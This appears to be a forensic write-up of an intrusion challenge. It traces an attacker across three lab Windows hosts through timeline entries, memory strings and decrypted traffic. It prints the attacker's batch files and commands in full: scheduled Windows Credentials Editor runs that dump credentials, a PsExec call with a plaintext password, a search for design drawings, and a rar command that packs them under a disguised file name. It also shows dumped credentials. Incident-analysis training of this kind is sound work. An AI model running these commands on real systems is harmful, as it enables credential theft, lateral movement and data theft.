FLD-SARIYADH-43 - net view command
1727925-Server Name Remark
1727926--------------------------------------------------------------------------------
1727927-\\DC-USTXHOU
1727928-\\ENG-USTXHOU-148
1727929-\\FLD-SARIYADH-43
1727930-\\IIS-SARIYADH-03
1727931:The command completed successfully.
FLD-SARIYADH-43 - net group command
1727932-Alias name administrators
1727933-Comment Administrators have complete and unrestricted access to the computer/domain
1727934-Members
1727935--------------------------------------------------------------------------------
1727936-Administrator
1727937-Amir
1727938-PETRO-MARKET\amirs
1727939-PETRO-MARKET\Domain Admins
1727940-sysbackup
2012-11-27 00:21:41 - FLD-SARIYADH-43 - net is used
Tue Nov 27 2012 00:21:41 14116 ...b r/rrwxrwxrwx 0 0 12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
FLD-SARIYADH-43 - net start output
1727949-These Windows services are started:
1727950- Application Layer Gateway Service
1727951- Automatic Updates
1727952- COM+ Event System
...snip
1727984- Terminal Services
1727985- Themes
1727986- WebClient
1727987- Windows Audio
1727988- Windows Firewall/Internet Connection Sharing (ICS)
1727989- Windows Management Instrumentation
1727990- Windows Time
1727991- Wireless Zero Configuration
1727992- Workstation
1727993:The command completed successfully.
2012-11-27 00:23:09 - FLD-SARIYADH-43 - sl.exe is used and put in prefetch
Tue Nov 27 2012 00:23:09 6768 macb r/rrwxrwxrwx 0 0 12020-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
FLD-SARIYADH-43 - Result of a scanning tool
1727994-Scan of 254 IPs started at Tue Nov 27 03:22:59 2012
1727995--------------------------------------------------------------------------------
1727996-172.16.223.8
1727997-Responded in 0 ms.
1727998-0 hops away
1727999-Responds with ICMP unreachable: No
1728000-TCP ports: 21 80
1728001-TCP 21:
1728002-[220 (vsFTPd 2.3.0)]
1728003-TCP 80:
1728004-[HTTP/1.1
200 OK Date: Tue, 27 Nov 2012 00:23:08 GMT Server: Apache/2.2.16
(Ubuntu) Last-Modified: Fri, 23 Nov 2012 15:06:45 GMT ETag:
"2194f-b1-4cf2aee9810d2]
1728005--------------------------------------------------------------------------------
1728006-172.16.223.47
1728007-Responded in 0 ms.
1728008-0 hops away
1728009-Responds with ICMP unreachable: No
1728010-TCP ports: 80 445
1728011-TCP 80:
1728012-[HTTP/1.1 200 OK Content-Length: 1433 Content-Type: text/html Content-Location: http://172.16
2012-11-27 00:23:35 - FLD-SARIYADH-43 - creation timestamp is finally placed on netuse.dll, gs.exe is put into prefetch and samsrv.dll as well as security.log and wc.exe are all touched in this time (sounds like password dumping to me!)
Tue Nov 27 2012 00:23:35 10454 mac. r/rrwxrwxrwx 0 0 12016-128-3 c:/WINDOWS/webui/netuse.dll
9990 macb r/rrwxrwxrwx 0 0 12021-128-4 c:/WINDOWS/Prefetch/GS.EXE-3796DDD9.pf
415744 .a.. r/rrwxrwxrwx 0 0 23442-128-3 c:/WINDOWS/system32/samsrv.dll
33280 .a.. r/rrwxrwxrwx 0 0 24393-128-3 c:/WINDOWS/system32/cryptdll.dll
Tue Nov 27 2012 00:23:40 1024 mac. r/rr-xr-xr-x 0 0 3342-128-3 c:/WINDOWS/system32/config/SECURITY.LOG
Tue Nov 27 2012 00:24:18 13084 ...b r/rrwxrwxrwx 0 0 12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
2012-11-27 01:26:47 - ENG-USTXHOU-148 - system5.bat is created
Tue Nov 27 2012 01:26:47 88 macb r/rrwxrwxrwx 0 0 11738-128-1 c:/WINDOWS/webui/system5.bat
ENG-USTXHOU-148 - Contents of the .bat file
@echo off
copy c:\windows\webui\wc.exe c:\windows\system32
at 19:30 wc.exe -e -o h.out
2012-11-27 00:27:21 - FLD-SARIYADH-43 - ps is used and put in prefetch
Tue Nov 27 2012 00:27:21 10330 ...b r/rrwxrwxrwx 0 0 12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf
2012-11-27 00:31:39 - FLD-SARIYADH-43 - system1.bat is written
Tue Nov 27 2012 00:31:39 91 ...b r/rrwxrwxrwx 0 0 12024-128-4 c:/WINDOWS/system1.bat
Tue Nov 27 2012 00:43:34 91 mac. r/rrwxrwxrwx 0 0 12024-128-4 c:/WINDOWS/system1.bat
2012-11-27 00:43:46 - FLD-SARIYADH-43 - system6.bat is written
Tue Nov 27 2012 00:43:45 184 macb r/rrwxrwxrwx 0 0 12026-128-1 c:/WINDOWS/system6.bat
2012-11-27 00:43:46 - IIS-SARIYADH-03 - system.dll is copied
Tue Nov 27 2012 00:44:16 5711 ...b r/rrwxrwxrwx 0 0 10872-128-3 c:/WINDOWS/webui/system.dll
Tue Nov 27 2012 00:44:16 5711 mac. r/rrwxrwxrwx 0 0 10872-128-3 c:/WINDOWS/webui/system.dll
Decrypted PCAP - system.dll is copied to IIS-SARIYADH-03
copy z:\system.dll .
copy z:\system.dll .
1 file(s) copied.
C:\WINDOWS\webui>
2012-11-27 00:53:49 - IIS-SARIYADH-03 - several files created.
Tue Nov 27 2012 00:53:49 303104 ..cb r/rrwxrwxrwx 0 0 10365-128-3 c:/WINDOWS/webui/gs.exe
Tue Nov 27 2012 00:55:41 1230 ...b r/rrwxrwxrwx 0 0 10780-128-3 c:/WINDOWS/webui/svchost.dll
Tue Nov 27 2012 00:56:43 303104 .a.. r/rrwxrwxrwx 0 0 10365-128-3 c:/WINDOWS/webui/gs.exe
1230 m.c. r/rrwxrwxrwx 0 0 10780-128-3 c:/WINDOWS/webui/svchost.dll
Decrypted PCAP - Information gathering on IIS-SARIYADH-03
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 06:49 PM <DIR> .
11/26/2012 06:49 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 06:44 PM 5,711 system.dll
11/26/2012 05:06 PM 208,384 wc.exe
6 File(s) 953,491 bytes
2 Dir(s) 7,004,934,144 bytes free
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6680 NTFS Local Disk
D 539 0 CDFS CD Drive
Z 15351 13079 NTFS Network Drive
COMMAND: LIST FILES (C:\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR AUTOEXEC.BAT 0 129964314217180000
DIR boot.ini 211 129981609811585442
DIR CONFIG.SYS 0 129964314217180000
DIR Documents and Settings 0 129964569290921031
DIR IO.SYS 0 129964314217180000
DIR MSDOS.SYS 0 129964314217180000
DIR NTDETECT.COM 47564 129981606020615962
DIR ntldr 250048 129981618306345996
DIR pagefile.sys 805306368 129984410083593750
DIR Program Files 0 129964566580312500
DIR RECYCLER 0 129982548503655357
DIR System Volume Information 0 129981611111718750
DIR WINDOWS 0 129984447946948861
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
...snip...
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
2012-11-27 00:53:29 - FLD-SARIYADH-43 - system2.bat is written
Tue Nov 27 2012 00:53:29 69 ...b r/rrwxrwxrwx 0 0 12027-128-3 c:/WINDOWS/webui/system2.bat
Tue Nov 27 2012 00:56:18 69 mac. r/rrwxrwxrwx 0 0 12027-128-3 c:/WINDOWS/webui/system2.bat
Decrypted PCAP - svchost.dll copied to IIS-SARIYADH-03
COMMAND: DOWN FILES (C:\WINDOWS\webui\system.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\system.dll: 5711)
COMMAND: CONTINUE
TOKEN: FILE DATA (5711)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
copy z:\svchost.dll .
copy z:\svchost.dll .
1 file(s) copied.
C:\WINDOWS\webui>
2012-11-27 00:55:41 - IIS-SARIYADH-03 - system.dll is copied
Tue Nov 27 2012 00:55:41 1230 ...b r/rrwxrwxrwx 0 0 10780-128-3 c:/WINDOWS/webui/svchost.dll
Decrypted PCAP - Information gathering on IIS-SARIYADH-03
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
DIR bootstat.dat 2048 129984410109687500
DIR clock.avi 82944 126750960000000000
DIR cmsetacl.log 373 129981622463220165
DIR Coffee Bean.bmp 17062 126750960000000000
...snip...
DIR Web 0 129981606114042698
DIR webui 0 129984509415736823
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\svchost.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\svchost.dll: 1230)
COMMAND: CONTINUE
TOKEN: FILE DATA (1230)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
2012-11-27 00:59:00 - FLD-SARIYADH-43 - system3.bat is written
Tue Nov 27 2012 00:59:00 56 macb r/rrwxrwxrwx 0 0 12028-128-1 c:/WINDOWS/webui/system3.bat
Decrypted PCAP - https.dll copied to IIS-SARIYADH-03
copy z:\https.dll .
copy z:\https.dll .
1 file(s) copied.
C:\WINDOWS\webui>
2012-11-27 01:00:34 - IIS-SARIYADH-03 - https.dll is copied
Tue Nov 27 2012 01:00:34 5282 mac. r/rrwxrwxrwx 0 0 10875-128-3 c:/WINDOWS/webui/https.dll
2012-11-27 01:04:59 - FLD-SARIYADH-43 - system4.bat is written
Tue Nov 27 2012 01:04:59 131 ...b r/rrwxrwxrwx 0 0 12029-128-3 c:/WINDOWS/webui/system4.bat
Tue Nov 27 2012 01:11:00 131 mac. r/rrwxrwxrwx 0 0 12029-128-3 c:/WINDOWS/webui/system4.bat
2012-11-27 01:05:24 - IIS-SARIYADH-03 - WinRAR created.
Tue Nov 27 2012 01:05:24 403968 ..cb r/rrwxrwxrwx 0 0 10380-128-3 c:/WINDOWS/webui/ra.exe
Tue
Nov 27 2012 01:05:55 48 macb d/drwxrwxrwx 0 0
10877-144-1 c:/Documents and Settings/sysbackup/Application Data/WinRAR
2012-11-27 01:11:00 - IIS-SARIYADH-03 - system4.bat copied to the system
Tue Nov 27 2012 01:11:00 131 m.c. r/rrwxrwxrwx 0 0 10876-128-1 c:/WINDOWS/system32/system4.bat
IIS-SARIYADH-03 - Rar bat file found in memory
@echo off
c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll "C:\Engineering\Designs\Pumps" -x*.dll
2012-11-27 01:11:19 - IIS-SARIYADH-03 - WinRAR accessed and pump files rar’d.
Tue Nov 27 2012 01:11:19 403968 .a.. r/rrwxrwxrwx 0 0 10380-128-3 c:/WINDOWS/webui/ra.exe
2048000 .a.. r/rrwxrwxrwx 0 0 10672-128-3 c:/Engineering/Designs/Pumps/pump1.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10681-128-3 c:/Engineering/Designs/Pumps/pump10.dwg
131 .a.b r/rrwxrwxrwx 0 0 10876-128-1 c:/WINDOWS/system32/system4.bat
109092 ...b r/rrwxrwxrwx 0 0 10878-128-3 c:/WINDOWS/webui/netstat.dll
Tue Nov 27 2012 01:11:20 2048000 .a.. r/rrwxrwxrwx 0 0 10667-128-3 c:/Engineering/Designs/Pumps/pump100.dwg
...snip...
Tue Nov 27 2012 01:11:39 2048000 .a.. r/rrwxrwxrwx 0 0 10763-128-3 c:/Engineering/Designs/Pumps/pump94.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10764-128-3 c:/Engineering/Designs/Pumps/pump95.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10765-128-3 c:/Engineering/Designs/Pumps/pump96.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10766-128-3 c:/Engineering/Designs/Pumps/pump97.dwg
2048000 .a.. r/rrwxrwxrwx 0 0 10767-128-3 c:/Engineering/Designs/Pumps/pump98.dwg
Tue Nov 27 2012 01:11:40 2048000 .a.. r/rrwxrwxrwx 0 0 10768-128-3 c:/Engineering/Designs/Pumps/pump99.dwg
109092 mac. r/rrwxrwxrwx 0 0 10878-128-3 c:/WINDOWS/webui/netstat.dll
2012-11-27 01:21:18 - FLD-SARIYADH-43 - wc.exe is accessed as well at AT being put in prefetch, indicating that a job is running
Tue Nov 27 2012 01:21:18 208384 .a.. r/rrwxrwxrwx 0 0 12015-128-3 c:/WINDOWS/webui/wc.exe
208384 ...b r/rrwxrwxrwx 0 0 12031-128-3 c:/WINDOWS/system32/wc.exe
322 ...b r/rrwxrwxrwx 0 0 12032-128-1 c:/WINDOWS/Tasks/At1.job
12960 ...b r/rrwxrwxrwx 0 0 12033-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
25088 .a.. r/rrwxrwxrwx 0 0 24481-128-3 c:/WINDOWS/system32/at.exe
FLD-SARIYADH-43 - wce output in memory
1537035-v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
1537036-Use -h for help.
1537037-amirs\PETRO-MARKET:!Yy128*Z
1537038-NETWORK
SERVICE\PETRO-MARKET:bcauG
0O;&N!WVAeOJG8^/+IY<\C*>WNH[*ciP"9d"F4a\Bo\:6:j7Bt25%'X>B/y(AR8,O,`qZKDlKuBJnwMzX8Ome'^gjOw)nN?YXU>Qo(U3(#bfOZRS%I
1537039-FLD-SARIYADH-43$\PETRO-MARKET:bcauG
0O;&N!WVAeOJG8^/+IY<\C*>WNH[*ciP"9d"F4a\Bo\:6:j7Bt25%'X>B/y(AR8,O,`qZKDlKuBJnwMzX8Ome'^gjOw)nN?YXU>Qo(U3(#bfOZRS%I
1537040-C:\WINDOWS\webui>
2012-11-27 01:19:41 - FLD-SARIYADH-43 - system5.bat is written
Tue Nov 27 2012 01:19:41 88 ...b r/rrwxrwxrwx 0 0 12030-128-3 c:/WINDOWS/webui/system5.bat
FLD-SARIYADH-43 - psexec system5.bat to 172.16.223.47 (IIS-SARIYADH-03)
1854481-Connecting to 172.16.223.47...
1854482-Starting PsExec service on 172.16.223.47...
1854483-Connecting with PsExec service on 172.16.223.47...
1854484-Copying system5.bat to 172.16.223.47...
1854485-Error copying system5.bat to remote system:
1854486-C:\WINDOWS\webui>
2012-11-27 01:21:07 - IIS-SARIYADH-03 - system5.bat created.
Tue Nov 27 2012 01:21:07 88 m.c. r/rrwxrwxrwx 0 0 10879-128-1 c:/WINDOWS/system32/system5.bat
IIS-SARIYADH-03 - system5.bat found in memory.
system5.bat
@echo off
copy c:\windows\webui\wc.exe c:\windows\system32
at 04:30 wc.exe -e -o h.out
FLD-SARIYADH-43 - Running the dir command on the webui directory.
Volume in drive C has no label.
Volume Serial Number is F87B-5AD8
Directory of C:\WINDOWS\webui
11/27/2012 04:19 AM <DIR> .
11/27/2012 04:19 AM <DIR> ..
11/27/2012 03:20 AM 303,104 gs.exe
11/27/2012 03:23 AM 10,454 netuse.dll
11/27/2012 03:20 AM 381,816 ps.exe
11/27/2012 03:20 AM 403,968 ra.exe
11/27/2012 03:20 AM 20,480 sl.exe
11/27/2012 03:56 AM 69 system2.bat
11/27/2012 03:59 AM 56 system3.bat
11/27/2012 04:11 AM 131 system4.bat
11/27/2012 04:19 AM 88 system5.bat
11/27/2012 03:20 AM 208,384 wc.exe
10 File(s) 1,328,550 bytes
2 Dir(s) 6,992,097,280 bytes free
2012-11-27 01:21:19 - FLD-SARIYADH-43 - Tasks folder is touched (usually residue from a task operating)
Tue Nov 27 2012 01:21:19 344 .a.. d/drwxrwxrwx 0 0 5458-144-1 c:/WINDOWS/Tasks
2012-11-27 01:22:07 - FLD-SARIYADH-43 - ps is accessed again
Tue Nov 27 2012 01:22:07 381816 .a.. r/rrwxrwxrwx 0 0 12012-128-3 c:/WINDOWS/webui/ps.exe
2012-11-27 01:22:08 - IIS-SARIYADH-03 - At1.job entry born
Tue Nov 27 2012 01:22:08 322 ...b r/rrwxrwxrwx 0 0 10880-128-1 c:/WINDOWS/Tasks/At1.job
Tue Nov 27 2012 01:23:23 13084 mac. r/rrwxrwxrwx 0 0 12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
48 mac. d/drwxrwxrwx 0 0 72-144-7 c:/WINDOWS/Temp
2012-11-27 01:24:20 - FLD-SARIYADH-43 - ps is also thrown into prefetch
Tue Nov 27 2012 01:24:20 10330 mac. r/rrwxrwxrwx 0 0 12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf
2012-11-27 01:27:31 - FLD-SARIYADH-43 - net commands are used (while we cannot tell which ones, the results of several commands are found in memory)
Tue Nov 27 2012 01:27:31 14116 mac. r/rrwxrwxrwx 0 0 12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
124928 .a.. r/rrwxrwxrwx 0 0 23983-128-3 c:/WINDOWS/system32/net1.exe
42496 .a.. r/rrwxrwxrwx 0 0 23984-128-3 c:/WINDOWS/system32/net.exe
FLD-SARIYADH-43 - net share output
1727942-There are no entries in the list.
1727943-Share name Resource Remark
1727944--------------------------------------------------------------------------------
1727945-ADMIN$ C:\WINDOWS Remote Admin
1727946-C$ C:\ Default share
1727947-IPC$
2012-11-27 01:27:03 - ENG-USTXHOU-148 - AT1.job, wc, and at.exe are all touched, indicating that a scheduled task is being set up or running
Tue Nov 27 2012 01:27:03 208384 .a.. r/rrwxrwxrwx 0 0 11725-128-3 c:/WINDOWS/webui/wc.exe
208384 ...b r/rrwxrwxrwx 0 0 11739-128-3 c:/WINDOWS/system32/wc.exe
322 ...b r/rrwxrwxrwx 0 0 11740-128-1 c:/WINDOWS/Tasks/At1.job
12948 ...b r/rrwxrwxrwx 0 0 11741-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
132608 .a.. r/rrwxrwxrwx 0 0 23410-128-3 c:/WINDOWS/system32/msv1_0.dll
94720 .a.. r/rrwxrwxrwx 0 0 24143-128-3 c:/WINDOWS/system32/iphlpapi.dll
25088 .a.. r/rrwxrwxrwx 0 0 24431-128-3 c:/WINDOWS/system32/at.exe
344 mac. d/drwxrwxrwx 0 0 5458-144-1 c:/WINDOWS/Tasks
ENG-USTXHOU-148 - Checking the AT job
Status ID Day Time Command Line
--------------------------------------------------------------------------------
: 1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>ms, Average = 0ms
C:\WINDOWS\webui>
FLD-SARIYADH-43 - checking the scheduled task
546541-us ID Day Time Command Line
546542--------------------------------------------------------------------------------
546543: 1 Today 4:30 AM wc.exe -e -o h.out
546544-C:\WINDOWS\webui>
FLD-SARIYADH-43 - .bat file commands
copy c:\windows\webui\wc.exe c:\windows\system32
at 13:50 wc.exe -e -o h.out
IIS-SARIYADH-03 - At1.job found in memory.
at 04:30 wc.exe -e -o h.out
"At1.job" (wc.exe) 11/27/2012 4:30:00 AM ** ERROR **
Unable to start task.
The specific error is:
0x80070002: The system cannot find the file specified.
Try using the Task page Browse button to locate the application.
2012-11-27 01:30:00 - IIS-SARIYADH-03 - At1.job created.
Tue Nov 27 2012 01:30:00 322 mac. r/rrwxrwxrwx 0 0 10880-128-1 c:/WINDOWS/Tasks/At1.job
IIS-SARIYADH-03 - Appears to be an error when running wc.exe. Found in memory.
Error: cannot generate LM Hash.
Error: cannot generate NT Hash.
Hashes: :%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2XError: Cannot extract auxiliary DLL!
%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2XUsing WCE Windows Service...
abForced Safe Mode Error: cannot read credentials using 'safe mode'.
ab%.8X:%s:%s:%.2X:%.2X%.8X:%s:%s:%.2X:%.2Xab
something terrible happened! could not allocate memory for new list!
WCE %s (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernanampliasecurity.com)
Use -h for help.
Options:
-l List logon sessions and NTLM credentials (default).
Optional: -r<refresh interval>.
-s Changes NTLM credentials of current logon session.
Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
-o saves all output to a file.
-r Lists logon sessions and NTLM credentials indefinitely.
Refreshes every 5 seconds if new sessions are found.
-c Run <cmd> in a new session with the specified NTLM credentials.
Parameters: <cmd>.
-e Lists logon sessions NTLM credentials indefinitely.
Refreshes every time a logon event occurs.
Parameters: <filename
2012-11-27 01:30:00 - ENG-USTXHOU-148 - wce is run and dumps it’s results into h.out
Tue Nov 27 2012 01:30:00 208384 .ac. r/rrwxrwxrwx 0 0 11739-128-3 c:/WINDOWS/system32/wc.exe
322 mac. r/rrwxrwxrwx 0 0 11740-128-1 c:/WINDOWS/Tasks/At1.job
268 macb r/rrwxrwxrwx 0 0 11742-128-1 c:/WINDOWS/system32/h.out
2012-11-27 01:30:00 - FLD-SARIYADH-43 - wc, h.out and at.1 job are all ran, passwords dumped and stored in h.out
Tue Nov 27 2012 01:30:00 208384 .ac. r/rrwxrwxrwx 0 0 12031-128-3 c:/WINDOWS/system32/wc.exe
322 mac. r/rrwxrwxrwx 0 0 12032-128-1 c:/WINDOWS/Tasks/At1.job
268 macb r/rrwxrwxrwx 0 0 12034-128-1 c:/WINDOWS/system32/h.out
400 mac. d/drwxrwxrwx 0 0 29-144-6 c:/WINDOWS/system32
2012-11-27 01:30:10 - FLD-SARIYADH-43 - wc.exe is put in prefetch as an artifact of executing
Tue Nov 27 2012 01:30:10 10720 macb r/rrwxrwxrwx 0 0 12035-128-4 c:/WINDOWS/Prefetch/WC.EXE-06BFE764.pf
2012-11-27 01:30:10 - ENG-USTXHOU-148 - WC is in prefetch (could be residue from it just running)
Tue Nov 27 2012 01:30:10 10720 macb r/rrwxrwxrwx 0 0 11743-128-4 c:/WINDOWS/Prefetch/WC.EXE-06BFE764.pf
2012-11-27 01:32:36 - ENG-USTXHOU-148 - AT is still in prefetch
Tue Nov 27 2012 01:32:36 12948 mac. r/rrwxrwxrwx 0 0 11741-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
2012-11-27 01:32:47 - FLD-SARIYADH-43 - at.exe is also placed in prefetch
Tue Nov 27 2012 01:32:47 12960 mac. r/rrwxrwxrwx 0 0 12033-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
2012-11-27 01:42:21 - ENG-USTXHOU-148 - memory is dumped
Tue Nov 27 2012 01:42:21 95104 m... r/rrwxrwxrwx 0 0 11744-128-3 c:/mdd.exe
2012-11-27 01:42:21 - FLD-SARIYADH-43 - mdd is running and the memory is being dumped.
Tue Nov 27 2012 01:42:21 95104 m... r/rrwxrwxrwx 0 0 12037-128-3 c:/Documents and Settings/amirs/mdd.exe
95104 m... r/rrwxrwxrwx 0 0 12038-128-3 c:/mdd.exe
2012-11-27 01:42:21 - IIS-SARIYADH-03 - mdd ran and memory was dumped.Tue Nov 27 2012 01:42:21 95104 m... r/rrwxrwxrwx 0 0 10882-128-3 c:/mdd.exe
Tue Nov 27 2012 01:50:07 144 mac. r/rrwxrwxrwx 0 0 9700-128-307 c:/WINDOWS/system32/config/netlogon.ftl
Tue
Nov 27 2012 01:50:26 1487 .a.. r/rrwxrwxrwx 0 0
10553-128-4 c:/Documents and Settings/saadmin/Start
Menu/Programs/Accessories/Windows Explorer.lnk
Tue Nov 27 2012 01:50:29 295936 .a.. r/rrwxrwxrwx 0 0 253-128-3 c:/WINDOWS/system32/winsrv.dll
Tue Nov 27 2012 01:50:54 56 .a.. d/drwxrwxrwx 0 0 10151-144-5 c:/Documents and Settings/saadmin
Tue
Nov 27 2012 01:51:00 1024 mac. r/rr-xr-xr-x 0 0
10588-128-4 c:/Documents and Settings/saadmin/ntuser.dat.LOG
Tue Nov 27 2012 01:51:38 95104 .acb r/rrwxrwxrwx 0 0 10882-128-3 c:/mdd.exe
Tue Nov 27 2012 01:52:37 536334336 ...b r/rrwxrwxrwx 0 0 10883-128-4 c:/iis-memdump.bin
Tue Nov 27 2012 01:52:43 1024 .a.. r/rr-xr-xr-x 0 0 3372-128-3 c:/WINDOWS/system32/config/system.LOG
Tue Nov 27 2012 01:52:44 1024 m.c. r/rr-xr-xr-x 0 0 3372-128-3 c:/WINDOWS/system32/config/system.LOG
Tue Nov 27 2012 01:52:52 536334336 mac. r/rrwxrwxrwx 0 0 10883-128-4 c:/iis-memdump.bin
Tue Nov 27 2012 01:53:20 44032 .a.. r/rrwxrwxrwx 0 0 1195-128-3 c:/WINDOWS/system32/ftp.exe
Tue Nov 27 2012 01:54:37 1024 mac. r/rr-xr-xr-x 0 0 3373-128-3 c:/WINDOWS/system32/config/software.LOG
Misc commands found in memory that don’t have a home.
ENG-USTXHOU-148 - Running ipconfig on 172.16.223.47 (IIS-SARIYADH-03)
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
Copying C:\WINDOWS\system32\ipconfig.exe to 172.16.223.47...
FLD-SARIYADH-43 - Contents of a .bat file, seeking out all .dwg files on the drive
FILE0
@echo off
dir /S C:\*.dwg > c:\windows\webui\https.dll
ENG-USTXHOU-148 - Attacker runs dir against the directory C:\Engineering\Designs\Pumps
Volume in drive C has no label.
Volume Serial Number is 9CC4-949D
Directory of C:\Engineering\Designs\Pumps
11/24/2012 10:50 PM 2,048,000 pump1.dwg
11/24/2012 10:50 PM 2,048,000 pump10.dwg
11/24/2012 10:50 PM 2,048,000 pump100.dwg
...snip...
11/24/2012 10:51 PM 2,048,000 pump71.dwg
11/24/2012 10:51 PM 2,048,000 pump72.dwg
11/24/2012 10:51 PM 2,048,000 pump73.dwg
11/24/2012 10:51 PM 2,048,000 pump74.dwg
11/24/2012 10:51 PM 2,048,000 pump75.dwg
11/24/2012 10:51 PM 2,048,000 pump76.dwg
11/24/2012 10:51 PM 2,048,000 pump77.dwg
11/24/2012 10:51 PM 2,048,000 pump78.dwg
11/24/2012 10:51 PM 2,048,000 pump79.dwg
11/24/2012 10:51 PM 2,048,000 pump8.dwg
FLD-SARIYADH-43 - Rar command to bundle up everything in the C:\Engineering\Design\Pumps directory (minus the dll’s) and name it netstat.dll
c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll "C:\Engineering\Designs\Pumps" -x*.dll
Backdoor PID
One of the challenge questions was to find the PID of the backdoor. To begin, we can search the pslist of using Volatility.$ vol.py -f memdump.bin --profile=WinXPSP2x86 pslist
Volatile Systems Volatility Framework 2.2
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
0x823c8830 System 4 0 51 271 ------ 0
0x821841c8 smss.exe 356 4 3 19 ------ 0 2012-11-26 22:03:28
0x821b0020 csrss.exe 604 356 12 351 0 0 2012-11-26 22:03:29
0x82189da0 winlogon.exe 628 356 18 653 0 0 2012-11-26 22:03:29
0x82194650 services.exe 680 628 15 243 0 0 2012-11-26 22:03:30
0x82244020 lsass.exe 692 628 22 407 0 0 2012-11-26 22:03:30
0x8219e2c8 svchost.exe 852 680 14 187 0 0 2012-11-26 22:03:31
0x82192b10 svchost.exe 940 680 9 258 0 0 2012-11-26 22:03:31
0x820b3da0 svchost.exe 1024 680 76 1645 0 0 2012-11-26 22:03:32
0x821a62e0 svchost.exe 1068 680 5 81 0 0 2012-11-26 22:03:32
0x821a3c10 svchost.exe 1116 680 14 248 0 0 2012-11-26 22:03:33
